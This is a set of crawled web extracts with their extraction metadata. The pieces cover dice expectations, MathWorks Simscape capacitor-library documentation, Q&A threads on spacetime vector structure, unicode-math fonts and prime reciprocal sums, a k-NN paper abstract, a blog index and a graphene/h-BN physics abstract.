\begin{array}{|c|c|c|c|c|c|c|} \hline X& 1 & 2 & 3 & 4 & 5 & 6 \\ \hline 1 & 2 & 3 & 4 & 5 & 6 & 7 \\ 2 & 3 & 4 ... 0 For each outcome of the two rolls, find the values of $X$ and $Z$ and the value of $W$ is given by their product. -1 Let's say a coin is tossed once: we get the Expectation of number of heads as E[R] = no.of heads*prob(no.of heads) = 1*1/2 = 1/2. Now let n=2, E[R2] = 2*1/4 + 1*2/4 + 0*1/4 = 1. Now let n=3, E[R3] = 3*1/8 + 2*3/8 + 1*3/8 = 12/8 = 3/2. As we keep continuing this we observe that E[Rn] = n*1/2. This is the linearity of Expectation. That is, E[R] = ... Top 50 recent answers are included
2015-11-26 21:57:21
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 1, "equation": 1, "x-ck12": 0, "texerror": 0, "math_score": 0.9983512163162231, "perplexity": 403.62515254156835}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2015-48/segments/1448398447783.20/warc/CC-MAIN-20151124205407-00091-ip-10-71-132-137.ec2.internal.warc.gz"}
https://uk.mathworks.com/help/physmod/simscape/lang/case-study-creating-a-basic-custom-block-library.html
## Case Study — Basic Custom Block Library ### Getting Started This case study explains how to build your own library of custom blocks based on component files. It uses an example library of capacitor models. The library makes use of the Simscape™ Foundation electrical domain, and defines three simple components. For more advanced topics, including adding multiple levels of hierarchy, adding new domains, and customizing the appearance of a library, see Case Study — Electrochemical Library. The example library comes built and on your path so that it is readily executable. However, it is recommended that you copy the source files to a new directory, for which you have write permission, and add that directory to your MATLAB® path. This will allow you to make changes and rebuild the library for yourself. The source files for the example library are in the following package directory: `matlabroot/toolbox/physmod/simscape/simscapedemos/+Capacitors` where `matlabroot` is the MATLAB root directory on your machine, as returned by entering ```matlabroot ``` in the MATLAB Command Window. After copying the files, change the directory name `+Capacitors` to another name, for example `+MyCapacitors`, so that your copy of the library builds with a unique name. ### Building the Custom Library To build the library, type ```ssc_build MyCapacitors ``` in the MATLAB Command Window. If building from within the `+MyCapacitors` package directory, you can omit the argument and type just ```ssc_build ``` When the build completes, open the generated library by typing ```MyCapacitors_lib ``` For more information on the library build process, see Building Custom Block Libraries. To add a block, write a corresponding component file and place it in the package directory. For example, the Ideal Capacitor block in your `MyCapacitors_lib` library is produced by the `IdealCapacitor.ssc` file. Open this file in the MATLAB Editor and examine its contents. ```component IdealCapacitor % Ideal Capacitor % Models an ideal (lossless) capacitor. The output current I is related % to the input voltage V by I = C*dV/dt where C is the capacitance. % Copyright 2008-2017 The MathWorks, Inc. nodes p = foundation.electrical.electrical; % +:top n = foundation.electrical.electrical; % -:bottom end parameters C = { 1, 'F' }; % Capacitance end variables i = { 0, 'A' }; % Current v = {value = { 0, 'V' }, priority = priority.high}; % Voltage drop end branches i : p.i -> n.i; % Through variable i from node p to node n end equations assert(C > 0) v == p.v-n.v; % Across variable v from p to n i == C*v.der; % Capacitor equation end end ``` First, let us examine the elements of the component file that affect the block appearance. Double-click the Ideal Capacitor block in the `MyCapacitors_lib` library to open its dialog box, and compare the block icon and dialog box to the contents of the `IdealCapacitor.ssc` file. The block name, Ideal Capacitor, is taken from the comment on line 2. The comments on lines 3 and 4 are then taken to populate the block description in the dialog box. The block ports are defined by the nodes section. The comment expressions at the end of each line control the port label and location. Similarly in the parameters section, the comments are used to define parameter names in the block dialog box. For details, see Customizing the Block Name and Appearance. Also notice that in the equation section there is an assert to ensure that the capacitance value is always greater than zero. This is good practice to ensure that a component is not used outside of its domain of validity. The Simscape Foundation library blocks have such checks implemented where appropriate. ### Adding Detail to a Component In this example library there are two additional components that can be used for ultracapacitor modeling. These components are evolutions of the Ideal Capacitor. It is good practice to incrementally build component models, adding and testing additional features as they are added. Ideal Ultracapacitor Ultracapacitors, as their name suggests, are capacitors with a very high capacitance value. The relationship between voltage and charge is not constant, unlike for an ideal capacitor. Suppose a manufacturer data sheet gives a graph of capacitance as a function of voltage, and that capacitance increases approximately linearly with voltage from the 1 farad at zero volts to 1.5 farads when the voltage is 2.5 volts. If the capacitance voltage is denoted v, then the capacitance can be approximated as: `$C=1+0.2·v$` For a capacitor, current i and voltage v are related by the standard equation `$i=C\frac{dv}{dt}$` and hence `$i=\left({C}_{0}+{C}_{v}·v\right)\frac{dv}{dt}$` where C0 = 1 and Cv = 0.2. This equation is implemented by the following line in the equation section of the Simscape file `IdealUltraCapacitor.ssc`: `i == (C0 + Cv*v)*v.der;` In order for the Simscape software to interpret this equation, the variables (`v` and `i`) and the parameters (`C0` and `Cv`) must be defined in the declaration section. For more information, see Declare Component Variables and Declare Component Parameters. ### Adding a Component with an Internal Variable Implementing some component equations requires the use of internal variables. An example is when implementing an ultracapacitor with resistive losses. There are two resistive terms, the effective series resistance R, and the self-discharge resistance Rd. Because of the topology, it is not possible to directly express the capacitor equations in terms of the through and across variables i and v. Ultracapacitor with Resistive Losses This block is implemented by the component file `LossyUltraCapacitor.ssc`. Open this file in the MATLAB Editor and examine its contents. ```component LossyUltraCapacitor % Lossy Ultracapacitor % Models an ultracapacitor with resistive losses. The capacitance C % depends on the voltage V according to C = C0 + V*dC/dV. A % self-discharge resistance is included in parallel with the capacitor, % and an equivalent series resistance in series with the capacitor. % Copyright 2008-2017 The MathWorks, Inc. nodes p = foundation.electrical.electrical; % +:top n = foundation.electrical.electrical; % -:bottom end parameters C0 = { 1, 'F' }; % Nominal capacitance C0 at V=0 Cv = { 0.2, 'F/V'}; % Rate of change of C with voltage V R = {2, 'Ohm' }; % Effective series resistance Rd = {500, 'Ohm' }; % Self-discharge resistance end variables i = { 0, 'A' }; % Current vc = {value = { 0, 'V' }, priority = priority.high}; % Capacitor voltage end branches i : p.i -> n.i; % Through variable i from node p to node n end equations assert(C0 > 0) assert(R > 0) assert(Rd > 0) let v = p.v-n.v; % Across variable v from p to n in i == (C0 + Cv*vc)*vc.der + vc/Rd; % Equation 1 v == vc + i*R; % Equation 2 end end end ``` The additional variable is used to denote the voltage across the capacitor, vc. The equations can then be expressed in terms of v, i, and vc using Kirchhoff’s current and voltage laws. Summing currents at the capacitor + node gives the first Simscape equation: `i == (C0 + Cv*vc)*vc.der + vc/Rd;` Summing voltages gives the second Simscape equation: `v == vc + i*R;` As a check, the number of equations required for a component used in a single connected network is given by the sum of the number of ports plus the number of internal variables minus one. This is not necessarily true for all components (for example, one exception is mass), but in general it is a good rule of thumb. Here this gives 2 + 1 - 1 = 2. In the Simscape file, the initial condition (initial voltage in this example) is applied to variable `vc` with ```priority = priority.high```, because this is a differential variable. In this case, `vc` is readily identifiable as the differential variable as it has the `der` (differentiator) operator applied to it. ### Customizing the Block Icon The capacitor blocks in the example library `MyCapacitors_lib` have icons associated with them. During the library build, if there is an image file in the directory with the same name as the Simscape component file, then this is used to define the icon for the block. For example, the Ideal Capacitor block defined by `IdealCapacitor.ssc` uses the `IdealCapacitor.jpg` to define its block icon. If you do not include an image file, then the block displays its name in place of an icon. For details, see Customize the Block Icon.
2020-11-24 10:20:14
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 3, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.5989392995834351, "perplexity": 1038.705625247446}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 5, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-50/segments/1606141176049.8/warc/CC-MAIN-20201124082900-20201124112900-00040.warc.gz"}
https://socratic.org/questions/how-can-i-write-the-electron-capture-equation
# How can I write the electron capture equation? ${\text{_(1)^(1) p + ""_(-1)^(0) e -> ""_(0)^(1) n + }}_{0}^{0} X$
2019-12-08 08:17:02
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 1, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.5918150544166565, "perplexity": 890.6486120774076}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-51/segments/1575540507109.28/warc/CC-MAIN-20191208072107-20191208100107-00035.warc.gz"}
https://physics.stackexchange.com/questions/563102/why-dont-we-assume-a-vector-space-structure-for-spacetime
# Why don't we assume a vector space structure for spacetime? At the outset I'll state that I understand completely why, physically speaking, there's no preferred frame - that's not what I'm asking in the question. I'm not sure why we don't give spacetime a vector space structure though. I realize that doing so forces us to identify a certain unique point in spacetime as the "universal" origin. But in the mathematical formulation, I don't see what's stopping us from doing that. Even if we can't physically pinpoint a preferred point in spacetime, it's an entirely different matter to choose an origin for mathematical convenience. What can go wrong with defining a vector space structure on spacetime even if we assume flat spacetime? And in the case of general relativity, what can go wrong with assuming that curved spacetime is embedded in an $$\mathbb{R}^4$$ vector space? If you assume flat spacetime and cartesian coordinates, then there's no problem with defining an affine structure on spacetime, and indeed this is often done by various authors who call $$x^\mu$$ the coordinates of a spacetime displacement vector. The situation is a bit more complicated in curvilinear coordinates, because the same vector will have different components depending on the base point to which it is attached, but this is not necessarily a deal-breaker. At the very least, one could define the affine structure with respect to an underlying cartesian coordinate system. A crucial aspect of a (real) affine structure is that starting from a given point $$a$$, a vector $$\vec v$$ defines an entire affine subspace, which consists of all points of the form $$a + \lambda \vec v$$ for $$\lambda \in \mathbb R$$. Denote this subspace $$\mathcal S(\vec v,a)$$. If a point $$b\neq a$$ lies in $$S(\vec v,a)$$ and $$S(\vec u,a)$$, then $$b = a + \lambda_1 \vec v = a + \lambda _2 \vec u$$ $$\implies \vec u = \frac{\lambda_1}{\lambda_2} \vec v$$ and therefore $$S(\vec v,a) = S(\vec u,a)$$. In this case, $$\vec v$$ and $$\vec u$$ are called parallel; we also say that $$\vec v$$ is tangential to $$S(\vec v,a)$$ at $$a$$. If $$a$$ and $$b$$ belong to the same affine subspace, then a tangent vector to that subspace at $$a$$ must be parallel to a tangent vector at $$b$$ (this follows trivially by definition); we might therefore say that an affine subspace is an autoparallel, which means simply that all of its tangent vectors are parallel to one another. In a space with nonzero curvature, this breaks down. Consider the space $$S^2$$ - the surface of a sphere. Let our starting point $$a$$ be the north pole, and consider two vectors - $$\vec v$$, which takes us to Manhattan, and $$\vec u$$, which takes us to Paris. These vectors would correspond to affine subspaces $$S(\vec v,a)$$ and $$S(\vec u,a)$$. Note that straight lines do not exist on the surface of a sphere; however, the notion of autoparallel curves still survives. The problem is that the south pole is in both $$S(\vec v,a)$$ and $$S(\vec u,a)$$, and via our analysis above, that implies that $$S(\vec v,a)=S(\vec u,a)$$, which clearly cannot be true. The reason for the breakdown is as follows. Given two points $$a$$ and $$b$$ in an affine space, there must be a unique displacement vector $$\vec v = b-a$$ which takes you from $$a$$ to $$b$$, and therefore a unique affine subspace of $$a$$ in which $$b$$ lies. On the surface of a sphere, this cannot possibly hold, because any two autoparallel curves which pass through a given point will also intersect at the antipodal point. As a result, there is no unique vector which takes you from a point to its antipode, and so the axioms of the affine space cannot be satisfied. One could object to this reasoning on the grounds that $$S^n$$ is closed, and therefore cannot be thought of as a manifold built on $$\mathbb R^4$$ as a carrier set as specified in the question. However, this can be countered with the following points. 1. There is no particular reason that we should rule such spaces out. A closed FLRW universe, for example, would have $$\mathbb R \times S^3$$ as a carrier set, and in principle there's no reason to think that we don't live in such a universe. 2. It is a generic feature of spaces with nonzero curvature that autoparallels (which are also geodesics in the standard formulation of GR) can intersect at multiple points. Therefore, while the situation is not necessarily as degenerate as the case of $$S^2$$ (in which every autoparallel passing through a point will also pass through its antipode), it remains the general case that there are points $$a\neq b$$ between which there is no unique geodesic, and therefore no unique way to assign a displacement vector to $$b-a$$. 3. Even in the absence of such intersections, vector addition on an affine space must commute, so $$a+(\vec v_1+\vec v_2) = (a+\vec v_1)+\vec v_2 = (a+\vec v_2)+\vec v_1$$. However, in the general case, this does not hold; following $$\vec v_1$$ and then $$\vec v_2$$ along their corresponding geodesics leads us to a different point than following $$\vec v_2$$ and $$\vec v_1$$, as per the following example$$^\dagger$$. It is precisely this non-commutivity which defines the presence of intrinsic curvature, and so we are led to the conclusion that if a space is curved, an affine structure (which necessarily includes commutative vector addition) cannot be defined. $$^\dagger$$The pictured manifold is the surface $$\mathcal M := \big\{(t,x,y)\in \mathbb R^3 \ | \ -t^2+x^2+y^2=1\big\}$$ In the $$(u,v)$$-coordinate system, in which $$t = \sinh(u)$$ $$x = \cosh(u)\cos(v)$$ $$y = \cosh(u)\sin(v)$$ the metric (which is inherited via the embedding of $$\mathcal M$$ in (1+2)-dimensional Minkowski space) takes the form $$g_{\mu \nu} = \pmatrix{1 & 0 \\ 0 &\sinh(u)}$$ and the non-vanishing connection coefficients are $$\Gamma^{u}_{vv} = -\cosh(u)/2$$ $$\Gamma^{v}_{uv}=\Gamma^{v}_{vu} = \coth(u)/2$$ • Excellent answer! One doubt related to first part of your answer: why assume an affine structure and not a linear one? Isn't a linear system easier to work with? For example, even with Earth, we don't define coordinates such that there's no absolute North/South poles. We definitely consider unique points as the poles because it's convenient, even though physically speaking, there's nothing special about North/South poles compared to any other pair of polar opposite points. So why not do the same for spacetime? (cont'd) – user9343456 Jul 2 '20 at 9:03 • (cont'd)... Even though there's not privileged point in spacetime, for mathematical convenience, that still shouldn't stop us from defining an origin as a matter of convention, right? This would mean a linear instead of affine structure and would make calculations easier? [all this assuming flat spacetime] – user9343456 Jul 2 '20 at 9:04 • @user9343456 I am a bit confused - we use coordinate systems with privileged points all the time, including polar coordinates, in both flat and curved spacetime. But you’re talking about adding and subtracting points in spacetime from one another, which is entirely different. – J. Murray Jul 2 '20 at 12:58 • @user9343456 Since every vector space can be considered an affine space, the latter is more general, so there’s no harm in talking about it instead of a linear structure. And in Newtonian physics, when we talk about displacement and force and momentum, those are all vectors tied to an affine structure, not a linear one. – J. Murray Jul 2 '20 at 13:01 • So basically, even though a linear structure would be the easier option, we opt for affine because it's built on weaker assumptions. We prefer more generality / weaker assumptions than computational ease - is that the case? – user9343456 Jul 2 '20 at 13:07 What can go wrong with defining a vector space structure on spacetime even if we assume flat spacetime? Actually, Minkowski space-time can be considered a $$4$$-dimensional vector space equipped with an indefinite, nondegenerate symmetric bilinear form. Possible problem with the "universal" origin can be easily solved by introducing an affine space structure. About a possible embedding in $$\mathbb{R}^4$$, things are not as simple. You may find some key information here.
2021-05-15 11:24:16
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 62, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8329088687896729, "perplexity": 214.41448056752435}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-21/segments/1620243991801.49/warc/CC-MAIN-20210515100825-20210515130825-00005.warc.gz"}
https://paperswithcode.com/paper/universal-consistency-of-the-k-nn-rule-in
# Universal consistency of the $k$-NN rule in metric spaces and Nagata dimension 28 Feb 2020  ·  , , · The $k$ nearest neighbour learning rule (under the uniform distance tie breaking) is universally consistent in every metric space $X$ that is sigma-finite dimensional in the sense of Nagata. This was pointed out by C\'erou and Guyader (2006) as a consequence of the main result by those authors, combined with a theorem in real analysis sketched by D. Preiss (1971) (and elaborated in detail by Assouad and Quentin de Gromard (2006)). We show that it is possible to give a direct proof along the same lines as the original theorem of Charles J. Stone (1977) about the universal consistency of the $k$-NN classifier in the finite dimensional Euclidean space. The generalization is non-trivial because of the distance ties being more prevalent in the non-euclidean setting, and on the way we investigate the relevant geometric properties of the metrics and the limitations of the Stone argument, by constructing various examples. PDF Abstract ## Code Add Remove Mark official No code implementations yet. Submit your code now ## Datasets Add Datasets introduced or used in this paper ## Results from the Paper Add Remove Submit results from this paper to get state-of-the-art GitHub badges and help the community compare results to other papers.
2022-08-09 20:31:30
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.6463513374328613, "perplexity": 966.5025522997643}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-33/segments/1659882571086.77/warc/CC-MAIN-20220809185452-20220809215452-00593.warc.gz"}
https://dataleek.io/
## AirBnB Visualization This is a followup visualization from my post on analyzing Boston’s AirBnB. The below embedding is less than perfect, so please check it out fullscreen. If it’s not rendering well for you, this is what you should see. The Python to convert the raw data to geojson is super straightforward. … ## Digging into my Discord I run a Discord server for my friends. We’ve essentially given up texting and now use Discord for virtually all communication. This server has been running since about January 2016, and we now have around 75 users and collectively we’ve sent almost 200,000 messages. I scraped all of this data … ## Virus Propagation and Markov Khan Academy Virus Propagation Part of the interview process at Khan Academy is to complete their interview project. This project deals with virus propagation through a directed network. We will be using the terms “graph” and “network” interchangeably, but I’m referring to the same thing for both. From a high … ## Integrating SMS with Twilio Let’s say that you need to integrate SMS capabilities into your project, and let’s also say that you’re using python. You can use Twilio to very easily integrate texts directly into your application. Setting Up Twilio First though, you’ll need a Twilio account. Go to their signup page, and create … ## Political Boundaries and Simulations Adapted as a talk for the Boulder Python Meetup Download archive here, or from gitlab.com/thedataleek/politicalboundaries. Press the space-bar to proceed to the next slide. See here for a brief tutorial Expand Code ## One Dimensional Maps Creating one-dimensional maps is a very easy and straightforward process that can be used to explore chaotic behavior. Given some function we take an initial value and use the iterative process $$x_{n+1} = f\left(x_n\right)$$ One popular map to explore is the Logistic Map, defined as x_{n+1} = … ## An Introduction to Plotting in Python After having some Applied Math friends rant to me at how awful plotting was in Python I decided to write up a quick guide to hopefully change their minds. Numpy This assumes a basic familiarity with numpy, although I’ll go over the basics really quickly just in case. The syntax/API … ## The Python Typing Module The typing module added in Python 3.5 (see reference docs here) adds additional types and meta-types to allow for more control over python type hints. In this post we’ll talk about what this module adds and what neat things you can do with it. This is the third post in … ## Python Type Hinting In Python 3.5 and greater an “optional type hinting syntax” was added. This is part of a gradual typing implementation (gradual typing is essentially adding a few types to an untyped codebase, or only partially typing the codebase as you go). This is the second post in a multi-part series …
2018-02-26 01:09:40
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.3577021062374115, "perplexity": 2211.072094239203}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-09/segments/1518891817908.64/warc/CC-MAIN-20180226005603-20180226025603-00500.warc.gz"}
https://tex.stackexchange.com/questions/227033/why-cant-i-use-my-font-with-unicode-math?noredirect=1
# Why can't I use my font with unicode-math? \documentclass{article} \usepackage{unicode-math} \setmathfont{Latin Modern Sans} \usepackage{mwe} \blindmathtrue \begin{document} \Blinddocument \end{document} The above fails with the error ERROR: Internal error: bad native font flag in map_char_to_glyph' --- TeX said --- --- HELP --- No help available What is causing this error and how can I pick fonts to avoid this in the future? • Latin Modern Sans has no math table. You have to use a font which has it, such as Latin Modern Math. If you want to use a font without a math table in mathmode with xelatex you have to use the mathspec package. – Henri Menke Feb 7 '15 at 15:23 • See also my question here: tex.stackexchange.com/questions/118244/… – Henri Menke Feb 7 '15 at 15:23 • not having a math table is perhaps a sign that it's not intended for math, as with classic tex math fonts though, once you have set up the main math font, you can if required set up text fonts for use as math alphabets – David Carlisle Feb 7 '15 at 15:26 • For explanation, see my answer here: tex.stackexchange.com/a/166185. For information on fonts which will work, see my answer here: tex.stackexchange.com/a/219414. – cfr Feb 7 '15 at 15:31 You have two options to overcome this issue. # 1. Use an OpenType Math Font For unicode-math to work you have to use an OpenType font which provides the math table, such as Latin Modern Math. This unfortunately defeats the implicit purpose of your MWE to use a sans serif font for maths. \documentclass{article} \pagestyle{empty} \usepackage{unicode-math} \setmathfont{Latin Modern Math} \begin{document} Lorem ipsum $\sum_{k=0}^\infty a_0q^k = \lim_{n\to\infty}\sum_{k=0}^n a_0q^k = \lim_{n\to\infty} a_0\frac{1-q^{n+1}}{1-q} = \frac{a_0}{1-q}$ dolor sit amet \end{document} # 2. Use the mathspec Package The mathspec allows to use any OpenType font for mathmode (at the cost of bad spacing). \documentclass{article} \usepackage{mathspec} \setmathfont(Latin,Digits,Greek){Latin Modern Sans} \setmathrm{Latin Modern Sans} \begin{document} Lorem ipsum $\sum_{k=0}^\infty a_0q^k = \lim_{n\to\infty}\sum_{k=0}^n a_0q^k = \lim_{n\to\infty} a_0\frac{1-q^{n+1}}{1-q} = \frac{a_0}{1-q}$ dolor sit amet \end{document} `
2020-04-10 01:04:01
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9021574258804321, "perplexity": 4034.0864732075997}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-16/segments/1585371880945.85/warc/CC-MAIN-20200409220932-20200410011432-00320.warc.gz"}
http://mathoverflow.net/revisions/4596/list
MathOverflow will be down for maintenance for approximately 3 hours, starting Monday evening (06/24/2013) at approximately 9:00 PM Eastern time (UTC-4). 3 deleted 288 characters in body It is well-known that A: The series of the reciprocals of the primes diverges My question is whether property A is in some sense a truth strongly tied to the nature of the prime numbers. For instance, can you give an example of an infinite subset $A \subseteq \mathbb{N}$ (different from $P$) such that $\sum_{a \in A} \frac{1}{a}$ diverges, $A$ contains infinitely many prime numbers and the $k$-th member of $A$ is greater than the $k$-th prime for infinitely many $k$? Property A tells us that the primes are a rather fat subset of $\mathbb{N}$. Is there a way to define a topology on $\mathbb{N}$ such that every dense subset of $\mathbb{N}$ (under this topology) corresponds to a fat subset of the natural numbers? 2 added 33 characters in body; deleted 7 characters in body It is well-known that A: The series of the reciprocals of the primes diverges My question is whether property A is in some sense a truth strongly tied to the nature of the prime numbers. For instance, can you give an example of an infinite subset $A \subseteq \mathbb{N}$ (different from $P$) such that $\sum_{a \in A} \frac{1}{a}$ diverges, $A$ doesn't contain any contains infinitely many prime numbers and the $k$-th member of $A$ is greater than the $k$-th prime for infinitely many $k$? Property A tells us that the primes are a rather fat subset of $\mathbb{N}$. Is there a way to define a topology on $\mathbb{N}$ such that every dense subset of $\mathbb{N}$ (under this topology) corresponds to a fat subset of the natural numbers? 1 # On the series 1/2 + 1/3 + 1/5 + 1/7 + 1/11 + ... It is well-known that A: The series of the reciprocals of the primes diverges My question is whether property A is in some sense a truth strongly tied to the nature of the prime numbers. For instance, can you give an example of an infinite subset $A \subseteq \mathbb{N}$ such that $\sum_{a \in A} \frac{1}{a}$ diverges, $A$ doesn't contain any prime numbers and the $k$-th member of $A$ is greater than the $k$-th prime for infinitely many $k$? Property A tells us that the primes are a rather fat subset of $\mathbb{N}$. Is there a way to define a topology on $\mathbb{N}$ such that every dense subset of $\mathbb{N}$ (under this topology) corresponds to a fat subset of the natural numbers?
2013-06-19 11:54:45
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9435392618179321, "perplexity": 145.08582590288907}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2013-20/segments/1368708739983/warc/CC-MAIN-20130516125219-00043-ip-10-60-113-184.ec2.internal.warc.gz"}
https://www.hanspub.org/journal/PaperInformation.aspx?paperID=54392
#### 期刊菜单 Band Structure and Quantum Phase Transition of Graphene/h-BN Heterojunction under Local Potential Control DOI: 10.12677/CMP.2022.113007, PDF, HTML, XML, 下载: 127  浏览: 247  国家自然科学基金支持 Abstract: The band structure and quantum phase transition of graphene/hexagonal boron nitride heterojunction (h-BN) under local potentials are studied by the tight-binding method. The result shows that the graphene layer is in the quantum spin Hall state and the h-BN layer is in the insulating state when the intrinsic spin-orbit coupling strength of the graphene layer is given. As the local potential of the graphene layer increases, the system will change from a quantum spin Hall state to a semiconductor state. New gapless edge states can be generated by tuning the local potential of the h-BN layer, so that the quantum spin Hall state of the graphene layer becomes the quantum spin Hall state composed of the edge states within and between layers. 1. 介绍 2. 模型与方法 ${H}_{MLG}=-{t}_{1}\underset{〈i,j〉,\alpha }{\sum }{C}_{i\alpha }^{†}{C}_{j\alpha }+i\lambda \underset{〈〈i,j〉〉,\alpha \beta }{\sum }{\upsilon }_{ij}{C}_{i\alpha }^{†}{\left({S}_{z}\right)}_{\alpha \beta }{C}_{j\beta }+\underset{i,\alpha }{\sum }{V}_{i}{C}_{i\alpha }^{†}{C}_{i\alpha }$ (1) 